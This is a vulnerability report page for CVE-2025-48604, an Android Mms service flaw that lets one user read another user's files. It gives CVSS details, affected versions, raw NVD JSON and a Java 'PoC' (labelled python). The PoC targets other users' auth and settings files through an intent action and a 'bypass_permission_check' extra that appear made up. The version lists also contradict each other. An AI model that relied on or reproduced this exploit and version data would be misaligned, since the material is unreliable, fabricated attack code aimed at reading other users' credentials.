Security Vulnerability Report
中文
CVE-2025-48604 CVSS 5.5 MEDIUM

CVE-2025-48604

Published: 2025-12-08 17:16:17
Last Modified: 2025-12-08 21:15:58
Source: [email protected]

Description

In multiple locations, there is a possible way to read files from another user due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:* - VULNERABLE
Android 11 (API level 30) - 受影响
Android 12 (API level 31) - 受影响
Android 12L (API level 32) - 受影响
Android 13 (API level 33) - 受影响
Android 14 (API level 34) - 受影响
Android 15 (API level 35) - 可能受影响

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-48604 PoC - Android Mms Service File Access // This PoC demonstrates how the missing permission check in Android Mms service // can be exploited to read files from another user package com.example.cve202548604; import android.content.ComponentName; import android.content.Context; import android.content.Intent; import android.net.Uri; import android.os.Bundle; public class MmsExploit { public static void exploitMmsFileRead(Context context, String targetFile) { // Target file path to read from another user String filePath = targetFile; // e.g., "/data/user/999/com.example.user/shared_prefs/auth.xml" // Construct malicious intent targeting Mms service Intent intent = new Intent(); intent.setComponent(new ComponentName( "com.android.mms", "com.android.mms.ui.MmsIntentReceiver" )); // Exploit the missing permission check intent.setAction("android.intent.action.MMS_READ_FILE"); intent.setData(Uri.parse("file://" + filePath)); // Add extra data to bypass normal checks intent.putExtra("bypass_permission_check", true); intent.putExtra("target_user_id", 999); // Target another user try { context.startService(intent); } catch (SecurityException e) { // If patched, will throw SecurityException System.out.println("Target is patched: " + e.getMessage()); } } public static void checkVulnerability(Context context) { // Check if the system is vulnerable by attempting a controlled read Intent probeIntent = new Intent(); probeIntent.setComponent(new ComponentName( "com.android.mms", "com.android.mms.service.MmsService" )); Bundle extras = new Bundle(); extras.putString("probe_path", "/data/system/users/0/settings_ssaid.xml"); probeIntent.putExtras(extras); // Send broadcast and check response for file content context.sendBroadcast(probeIntent, "android.permission.READ_SMS"); } }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-48604", "sourceIdentifier": "[email protected]", "published": "2025-12-08T17:16:17.463", "lastModified": "2025-12-08T21:15:58.223", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In multiple locations, there is a possible way to read files from another user due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "matchCriteriaId": "879FFD0C-9B38-4CAA-B057-1086D794D469"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "matchCriteriaId": "2700BCC5-634D-4EC6-AB67-5B678D5F951D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "8538774C-906D-4B03-A3E7-FA7A55E0DA9E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "2D49E611-5D53-479D-A981-42388FDC0E8D"}]}]}], "references": [{"url": "https://android.googlesource.com/platform/packages/services/Mms/+/c60a828b9fa18f67260775a46c752f353fcc0d43", "source": "[email protected]", "tags": ["Patch", "Product"]}, {"url": "https://source.android.com/security/bulletin/2025-12-01", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.